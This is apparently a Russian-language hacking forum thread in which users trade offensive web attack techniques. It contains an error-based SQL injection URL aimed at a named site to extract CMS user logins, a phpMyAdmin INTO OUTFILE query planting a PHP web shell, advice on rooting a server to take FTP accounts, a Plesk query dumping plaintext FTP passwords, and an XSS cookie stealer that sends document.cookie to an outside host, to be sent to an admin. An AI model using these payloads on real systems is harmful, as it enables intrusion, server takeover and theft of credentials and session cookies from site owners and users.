вывода и не будет, потому что это блайнд. в данном случае можно добиться вывода в ошибке. раскрутил по методу qwazar'a : HTML: http://jetterauto.ru/index/page/id/411+and+1=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cms_user_list.login,0x27,0x7e)+from+mainfra_jetter_tst.cms_user_list+order+by+login+limit+0,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1
Товарищ, не знаю что за эксплоит но примерно я бы сделал такой вывод - если там написано, чтобы я проверил наличие файла sos.txt а его там нету значит эксплоит не заработал, может потому, что уязвимое ПО запатчено.
Траблы с залитием шела через phpmyadmin File_priv : Y Делаю запрос : SELECT '<? passthru("$cmd"); ?>' into OUTFILE '/var/www/html/web/site.com/shell.php' Мне в ответ: #1 - Can't create/write to file '/var/www/html/web/site.com/shell.php' (Errcode: 13) Почему вылазит такая ошибка и файл не создается?
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку. там чёто типа floor rand. токо не могу найти мануал...
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль Направте в нужном направлении информацией или чем капнуть туда?!
pma - это скрипт для управления базами данных и никакого отношения к фтп не имеет. единственный вариант, который возможен - это залить шелл через pma, порутать сервак и выудить фтп акк) клац есть ещё вариант найти акк в конфигах сайта. на чём он стоит?
Нужно зать что за ПО там стоит, и где хранятся пароли, бывает случаи (например Plesk Panell) где данные хранятся в базе, более того, в не зашифрованном виде, и для того что бы получить полный список всех фтп, достаточно выполнить: PHP: SELECT REPLACE(sys_users.home,'/home/httpd/vhosts/','') AS domain, sys_users.login,accounts.password FROM sys_users LEFT JOIN accounts on sys_users.account_id=accounts.id ORDER BY sys_users.home ASC Но в большинстве случаев, конечно же пароли так просто не достать, так что как минимум нужно закрепится, и начать исследовать систему изнутри.
эээээ.... а что должно быть там? если хочешь выполнения js кода, то юзай <script src=...> вместо <iframe src=...>
Спасибо большое, там работает только iframe. Получилось так: <iframe src="http://site.ru/xss.php"></iframe> Содержимое xss.php Code: <script> img = new Image(); img.src = "http://httpz.ru/nlj6byr15oq.gif?"+document.cookie; </script> Теперь когда захожу по адресу, присылает: Code: IP: **.***.22.87 Query: empty REFERER: http://site.ru/xss.php AGENT: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 это значит работает ? Можно админу отправлять на почту ссылку ? если бы были кукисы, оно бы мне прислало их ?
зайди на site.ru , потом в адресной строке напиши Code: javascript:document.cookie='test_cookie=31337'; и попробуй заюзать свою xss ещё раз. узнаешь наверняка.